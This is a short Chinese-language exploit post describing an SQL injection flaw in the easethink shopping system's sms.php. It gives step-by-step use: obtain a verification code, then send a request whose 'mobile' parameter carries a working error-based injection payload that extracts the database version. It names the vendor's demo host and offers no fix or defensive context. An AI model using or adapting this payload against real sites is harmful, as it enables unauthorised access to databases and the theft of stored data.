easethink购物系统 sms.php 文件注射漏洞

可以看到没做过滤 ------------------------------------ 利用方法如下 1. http://demo.easethink.com/sms.php?act=subscribe 首先获得验证码! 将其拼接到下一步中的verify 2.  http://demo.easethink.com/sms.php?act=do_subscribe&verify=这里是获得的验证码填写地址&mobile=111'and(select%201%20from(select%20count(*),concat(0x7c,(select%20(Select%20version())%20from%20information_schema.tables%20limit%200,1),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%23 ok,没图没真相,上测试图   ----------------------------------------------------------------------- by:kk  

发表评论